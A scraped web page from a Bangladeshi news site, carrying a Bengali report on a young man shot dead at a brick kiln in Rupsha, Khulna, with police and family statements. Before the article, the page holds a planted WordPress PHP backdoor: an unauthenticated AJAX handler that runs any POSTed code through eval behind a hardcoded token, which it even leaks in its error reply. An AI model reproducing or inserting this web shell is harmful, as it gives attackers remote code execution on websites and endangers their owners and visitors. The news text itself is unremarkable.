// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== খুলনায় তরুণকে গুলি করে হত্যা | potrikaybangladesh.com
Friday, October 2, 2026
Homeঅপরাধখুলনায় তরুণকে গুলি করে হত্যা

খুলনায় তরুণকে গুলি করে হত্যা

খুলনার রূপসা উপজেলায় এক তরুণকে গুলি করে হত্যা করেছে দুর্বৃত্তরা। গতকাল মঙ্গলবার রাতে উপজেলার নৈহাটি ইউনিয়নের একটি ইটভাটায় এ ঘটনা ঘটে।

নিহত তরুণের নাম ফখরুল শেখ। তিনি নৈহাটি গ্রামের বাসিন্দা।

পুলিশ ও স্থানীয় সূত্রে জানা গেছে, রূপসা ব্রিকস নামের ওই ইটভাটায় বিভিন্ন সময় চুরির ঘটনা ঘটে। সে কারণে মাঝেমধ্যে রাতে সেখানে পাহারার দায়িত্ব পালন করতেন ফখরুল শেখ।

ঘটনার রাতে ইটভাটার ভেতরে অবস্থান করছিলেন তিনি। আনুমানিক রাত ১টার দিকে দুর্বৃত্তরা ইটভাটায় প্রবেশ করে তাকে গুলি করে পালিয়ে যায়।

ঘটনার পর খবর পেয়ে বড় ভাই ফরহাদ শেখ দ্রুত ইটভাটায় গিয়ে ছোট ভাইকে গুলিবিদ্ধ অবস্থায় পড়ে থাকতে দেখেন।

পরে স্থানীয়দের সহায়তায় ফখরুলকে উদ্ধার করে রূপসা উপজেলা স্বাস্থ্য কমপ্লেক্সে নেওয়া হয়। সেখানে চিকিৎসক তাকে মৃত ঘোষণা করেন।

নিহতের বড় ভাই ফরহাদ শেখ বলেন, ফখরুলের শরীরে দুটি গুলির আঘাত রয়েছে। একটি গুলি লাগে ঘাড়ে। আরেকটি ডান চোয়ালের নিচ দিয়ে ঢুকে বাম কানের ওপর দিয়ে বেরিয়ে যায়।

পারিবারিক সূত্রে জানা গেছে, চার ভাই ও এক বোনের মধ্যে ফখরুল ছিলেন সবার ছোট। তার দুটি মেয়ে আছে।

রূপসা থানার ওসি (তদন্ত) মো. আব্দুর সবুর খান দ্য ডেইলি স্টারকে বলেন, খবর পেয়ে আমরা ঘটনাস্থল পরিদর্শন করেছি। মরদেহ খুলনা মেডিকেল কলেজ হাসপাতালে পাঠানো হয়েছে ময়নাতদন্তের জন্য।

তিনি বলেন, সুরতহালে দেখা যায়, শরীরে দুটি গুলি লেগেছে। তার ভাই ফরহাদ শেখ বাদী হয়ে থানায় একটি এজাহার দায়ের করেছেন। এখনো কাউকে গ্রেপ্তার করা যায়নি। তবে অভিযান অব্যাহত রয়েছে।

তিনি আরও বলেন, কে বা কারা এবং কী কারণে ফখরুলকে হত্যা করেছে, তা এখনো নিশ্চিত নয়।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments